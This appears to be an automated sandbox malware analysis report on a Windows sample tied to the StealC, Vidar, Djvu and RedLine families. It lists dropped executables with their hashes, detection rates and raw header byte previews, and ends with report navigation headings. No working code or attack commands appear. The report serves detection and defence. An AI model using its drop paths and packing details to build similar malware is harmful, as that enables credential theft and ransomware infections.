....,.2#_..9..d.{..(.b.....;SHA.Q.....E..t..Z?...E-...R..P.QK.Q@.E-%..R.%.(c2K"F..1....+.o.x}$1E.Ey7x.......1..15..../.j..4......`..n.Y...J..zu.....R?.....m..L.

Process:	C:\Users\user\Documents\SimpleAdobe\FDsH_f9gemssdAs7w06vZwlL.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5241404324800358
Encrypted:	false
SSDEEP:	96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
MD5:	241322143A01979D346689D9448AC8C0
SHA1:	DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
SHA-256:	65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
SHA-512:	9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\H61tUtaRHb9b8i2Ptr3ABL5b.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3147776
Entropy (8bit):	7.992268418625357
Encrypted:	true
SSDEEP:	98304:ZI6EwkP9homUo618SS3qKhINbwvlQv38Gp3GR:q6EwU9E8RaKhI6yvs8+
MD5:	A032B8D3908C0282D9ACB8647CEC1765
SHA1:	B362D15E7CB64808F6BEDE1E656A7622877A05DE
SHA-256:	5B17A625237D0ED8738C793EB8D9E9E8CBE4CEFF92CFAC515BECE76BA9341591
SHA-512:	B6DD57C3DCDD4A1BEFBD332D0B82C70555A49E60DA4DFA4A4A220E35B89E001520ABB20F311C4993A53A78179A83BF47E68ED0DE68631A6AB44F43358FCBFC61
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......j.....s...s...s.e.p.%.s.e.v...s.e.t./.s..y..*.s..yw.=.s..yp.4.s..yv.u.s.e.w.6.s.e.u./.s.e.r.5.s...r...s..zz.2.s..z../.s..../.s..zq./.s.Rich..s.................PE..L....iLf...............'.....\|.......%............@..........................@............@... .. .... .. ..........PP......(_.......`..4...................0P...............................P.......................................................................<..................@........................@..............@............P...P.......B..............@............ ...........J..............@....................b...J..............@....rsrc.... ...`......................@..@..........y......(..................@....data.... ".. ....".................@...................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\_vgILobA0xXbWeowDxO5iZdo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	468480
Entropy (8bit):	7.707638639777151
Encrypted:	false
SSDEEP:	12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
MD5:	F14B083F53FEFD0071732BF5C0DCD6FA
SHA1:	661566E9131C39A1B34CABDE9A14877D9BCB3D90
SHA-256:	2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
SHA-512:	889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...\|...\|...\|..}...\|..}...\|..}...\|..}...\|...\|V..\|.l.}...\|.l.}...\|.l.}@..\|.o.}...\|.o.}...\|Rich...\|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\Q7vDtN_em7fitYNxQll9ewNo.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	468480
Entropy (8bit):	7.707638639777151
Encrypted:	false
SSDEEP:	12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
MD5:	F14B083F53FEFD0071732BF5C0DCD6FA
SHA1:	661566E9131C39A1B34CABDE9A14877D9BCB3D90
SHA-256:	2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
SHA-512:	889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...\|...\|...\|..}...\|..}...\|..}...\|..}...\|...\|V..\|.l.}...\|.l.}...\|.l.}@..\|.o.}...\|.o.}...\|Rich...\|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073530215204208
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr9:KooCEYhgYEL0In
MD5:	8F26CBA6944E198AE2E0DF6F6B138F5B
SHA1:	EC5F5D3BEDE629AF6A19CF0D4A8FF8D27D27E228
SHA-256:	8F4CC455B75D17C48C1FF5C4A090AF897E39E4A1993FFFE38A46113388683F92
SHA-512:	100AA0268050A21DC68FBBCE56CC498D5E0A9747681182580F6CC109D32FD3D7DF23186DCB96F83AB6147BC0A366A3A868E318FD63F47F19DBAA66DD0BC09C2D
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\uyMYdkI0kpEOwxO0H1smOiYQ.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:17 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	3.509897168349263
Encrypted:	false
SSDEEP:	48:8SndZTzoRGRYrnvVdAKRkdA5q+9Jq87dAKRFdAKR/U:8Svw1
MD5:	A35FDD40120F8769B98BF7E1EDE023C0
SHA1:	979C16752A696444F4F7854E1F18C8BC4B1E6286
SHA-256:	A34FA17D19AD393A7727EFEDDFF952F3D49E9FA81120226591ADD187D6F98D18
SHA-512:	307EC70AAD5E6CD794F2C4176F693ACDADE185BAC5A03CC1219346D3E8CC79A61141A148476023F95E1DC25F9E85691455EE980A8A362A9B50DF971737CBD27F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......,.....K.........q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DW.V..PROGRA~1..t......O.IDW.V....B...............J.....i...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDW.W....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDW(W....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDW.V..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDWI`..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.A.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.?. .-.-.l.o.a.d.-

Process:	C:\Users\user\Documents\SimpleAdobe\mqno7fOpkNXkRXNi1WQAv6HN.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11403264
Entropy (8bit):	7.976262170621303
Encrypted:	false
SSDEEP:	196608:SYvZvPF60956XHt6+YF+ELzL2Zjbn2YH0oD6DGcCwHbGkG:3Fcw5kHo5F+E+j7260oOYc
MD5:	D43AC79ABE604CAFFEFE6313617079A3
SHA1:	B3587D3FA524761B207F812E11DD807062892335
SHA-256:	8B750884259DD004300A84505BE782D05FCA2E487A66484765A4A1E357B7C399
SHA-512:	BB22C73ED01FF97B73FEB68AE2611B70EF002D1829035F58A4BA84C5A217DB368AAE8BDC02CDEC59C1121922A207C662AA5F0A93377537DA42657DD787587082
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...._3f..........#..........,......`..........@.......................................... .................................................06..d.......X,...Y...*..............................................(....W..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0....,......................... ..`.text1..8...........................@....text2............................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\unbmFXV_GPtCMFoyWe7JMXak.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	744960
Entropy (8bit):	7.822971503052979
Encrypted:	false
SSDEEP:	12288:q+dJfgo8vQKBuYVcUOmsIzxGd1OrZ7Ir2YjqF7fKjnmaoBt9WWayr9q0:hgoWQKBuXUtgdAJ2maoBtKyr9q0
MD5:	ADD437E239EBA1CEABCA80AF38F80B56
SHA1:	7D288EB76B3F0B1B3C37A020A61E97D4E43A1450
SHA-256:	2CE2C104C964166CF5FC95D7C855C173533BF28B7053A398BB01E757FD0D94EA
SHA-512:	C6447B5E35F05399EFB4263DB09C2E980F402C2368A06806A37684B0B248635B6F64F51587479D9FE66F833F5C44EA7A571CE7D5F5886A5EB54B6DF30F9A9FD5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)..)..)..{..)..{1..)..{0.)..QB.)..)...)....4.)..{..)......)..Rich.)..........................PE..L...`{]e............................v=....... ....@............................................................................<....@...............................................................x..@............ ..P............................text...#........................... ..`.rdata..Rk... ...l..................@..@.data...........8...\|..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	8094
Entropy (8bit):	5.800955417409617
Encrypted:	false
SSDEEP:	192:asNA4leiRUxJQIkepn6qRAq1k8SPxVLZ7VTiq:asNAUAWTex6q3QxVNZTiq
MD5:	DB26DCDCC16B514D8D8564DF4BF68E78
SHA1:	C881DCE0B0FD0C81D172C3490E39BC8F34E71F49
SHA-256:	378AAFD6DF5FFB8F96784079DB5A041C1AF657EFBC76F1D686EFE1205AB9420F
SHA-512:	F0A314FC825D449B2514BBC5B22EC899F04ADC2543CDA0A1963C3570B45ABA40AA3CD34B94524598C3966218FA68EA8EFFB89021DD44764FBB1E92F24F87CBF0
Malicious:	false
Reputation:	unknown
Preview:	{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

Process:	C:\Users\user\Desktop\BI6oo9z4In.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11403264
Entropy (8bit):	7.976262170621303
Encrypted:	false
SSDEEP:	196608:SYvZvPF60956XHt6+YF+ELzL2Zjbn2YH0oD6DGcCwHbGkG:3Fcw5kHo5F+E+j7260oOYc
MD5:	D43AC79ABE604CAFFEFE6313617079A3
SHA1:	B3587D3FA524761B207F812E11DD807062892335
SHA-256:	8B750884259DD004300A84505BE782D05FCA2E487A66484765A4A1E357B7C399
SHA-512:	BB22C73ED01FF97B73FEB68AE2611B70EF002D1829035F58A4BA84C5A217DB368AAE8BDC02CDEC59C1121922A207C662AA5F0A93377537DA42657DD787587082
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...._3f..........#..........,......`..........@.......................................... .................................................06..d.......X,...Y...*..............................................(....W..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0....,......................... ..`.text1..8...........................@....text2............................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\8WUnp6Y_Ak5XjHYYEp1aIJYJ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	468480
Entropy (8bit):	7.707638639777151
Encrypted:	false
SSDEEP:	12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
MD5:	F14B083F53FEFD0071732BF5C0DCD6FA
SHA1:	661566E9131C39A1B34CABDE9A14877D9BCB3D90
SHA-256:	2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
SHA-512:	889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...\|...\|...\|..}...\|..}...\|..}...\|..}...\|...\|V..\|.l.}...\|.l.}...\|.l.}@..\|.o.}...\|.o.}...\|Rich...\|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\WuCWK8yqSjYPSqgAmQSoYHzV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6670074
Entropy (8bit):	7.99615018517507
Encrypted:	true
SSDEEP:	196608:91OCbwow2nnzj0nqh2FjanVU78gw9USg1H:3OXow2nnzj0na2FNl1H
MD5:	4940E4F22CE7C072AC676E4493F6277C
SHA1:	5BB679D3D33CAF31D70E8AB85036455FFE4F30EE
SHA-256:	1DF5E3EFFE3460A818B8D71B51643BBE92F72E8EEECA08D15B8A05A46529D494
SHA-512:	8F39871EEC849D236DBF23F63A0625C9963F11B5ADCE5C7D18C3037A34AA519D4FDED61FC9057682A4FF8595D807FD81ED701FDE28319FD9ED9DF80AB8D8A9CC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\7zSC067.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7033344
Entropy (8bit):	7.768672747334295
Encrypted:	false
SSDEEP:	196608:iuf2vfM55O/AoASRtStcRjQhDDLe6NHsgVgYxeNpG:JKfoOPASR4XUoHtVk0
MD5:	FDF1795DD29A5501FC75C8FF7C24ADDA
SHA1:	16CF639737ADB8FB9A7A99A8F965AFECD0E9C893
SHA-256:	1971455B20B804B4536E2459D672EE5781C2EB75A885F0DCF7324AEC907C04F7
SHA-512:	ECAF57B52DB0ED4B1318842924D156ADC55249E395CAEC2DAADADD5672A9A7609A2DD6FCAF0102469A29C545699D2AE24C763C6EEF0EC9A82BAAA0E4028EAF43
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........q..."..."...".#"...".."...".."P.."..7"..."..."..."hz."..."hz""..."Rich..."........................PE..L.....Ma.................v....`......O............@...........................k...... l...@.................................Hck...............................k.h@....................................j.@............`k.H............................text....t.......v.................. ..`.data....._......._..z..............@....idata.......`k.......j.............@..@.reloc..h@....k..B....k.............@..B........................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\jNWxa0Pc_jGneI3LjcIqUJSt.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	696832
Entropy (8bit):	6.462777508456046
Encrypted:	false
SSDEEP:	12288:L0QfKb7nH5lrPo37AzHTA63I0ihE4UEQrrNtIECORGv75ELAfXExy8:ffKbT5lrPo37AzHTA63/cfU9IEU753f0
MD5:	F1EE51C7EACCE1E7DE399503FCF98464
SHA1:	F15E223943D1E3D7D9FAF908CFA54DA7CC6A1E4B
SHA-256:	560C4F40EBBAA3E66A4A778EA8B278C9BB1285EE468B64EFA820ED0A41849552
SHA-512:	47DA2D4959D10E87C926323EEA4B67E06ED8116C7F92CF36E2A87B4D9F1061EECA1CD2A817015EBAD6C349AA15E40546D0EAA7EE461024156BEA8239EE01CA27
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.................&...........1.......@....@..............................................@...............................%...`...>..........................................................................................................CODE.....$.......&.................. ..`DATA....<....@.....................@...BSS..........`.......<...................idata...%.......&...<..............@....tls.................b...................rdata...............b..............@..P.reloc..............................@..P.rsrc....>...`...>...d..............@..P.....................*..............@..P........................................................................................................................................

Process:	C:\Users\user\AppData\Local\Temp\is-CMND8.tmp\jNWxa0Pc_jGneI3LjcIqUJSt.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:	48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\DbsmJHnmNOlKFVGvWfuU03Cy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	881664
Entropy (8bit):	6.555251818096116
Encrypted:	false
SSDEEP:	24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
MD5:	66064DBDB70A5EB15EBF3BF65ABA254B
SHA1:	0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
SHA-256:	6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
SHA-512:	B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................

Process:	C:\Users\user\Documents\SimpleAdobe\XUm5iHwFVfNXnTAqN672Jc3R.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.2776134368191165
Encrypted:	false
SSDEEP:	3:1EX:10
MD5:	EC3584F3DB838942EC3669DB02DC908E
SHA1:	8DCEB96874D5C6425EBB81BFEE587244C89416DA
SHA-256:	77C7C10B4C860D5DDF4E057E713383E61E9F21BCF0EC4CFBBC16193F2E28F340
SHA-512:	35253883BB627A49918E7415A6BA6B765C86B516504D03A1F4FD05F80902F352A7A40E2A67A6D1B99A14B9B79DAB82F3AC7A67C512CCF6701256C13D0096855E
Malicious:	false
Reputation:	unknown
Preview:	[General]..

File type:	MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Entropy (8bit):	7.246562693253406
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	BI6oo9z4In.exe
File size:	6'961'664 bytes
MD5:	04196b8a0869c9f19b3805b4f861a0e1
SHA1:	8ed2478e15af46fa12059bc2e47cc638f3238fb0
SHA256:	34f4c84b4046eb6c9b1a30ebaecc226f60170d8c575319354ae120c40e589973
SHA512:	84f9f1de0c8bacce56917e401b8d5ff6a5613b9e231877e8d8be37bdfc03718605f2de39066bafb7fa44435d6eab840ed9c4868716d5127c86f2111b24786e82
SSDEEP:	98304:txondzNbVrqNn9C18EPukfT6fys71nMBEKew2OfVcc:LSbqNn9C1LfT6nyBEKew2OfVcc
TLSH:	67667C62A2581898D72CA0B86690FD2E4345F0266EE07DC397F532F6E51FB5C3E1A707
File Content Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...".;f.........."....'............?..........@.............................P......v.k... .............................................................D..................................

Entrypoint:	0x140bb7f3f
Entrypoint Section:	.themida
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
Time Stamp:	0x663B8A22 [Wed May 8 14:20:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	1ba19d25372b3cb9b6f9bdd416ebf12c

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BI6oo9z4In.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: Djvu

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows Media Player\background.jpg

C:\ProgramData\AEBGHDBKEBGIDHJJEHCAECBKJE

C:\ProgramData\CAEGHIJEHJDHIDHIDAEH

Windows Analysis Report
BI6oo9z4In.exe

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9e90ba	0x118	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9cc000	0x1c344	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xdfb9f0	0xc	.themida
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x9ea018	0x28	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
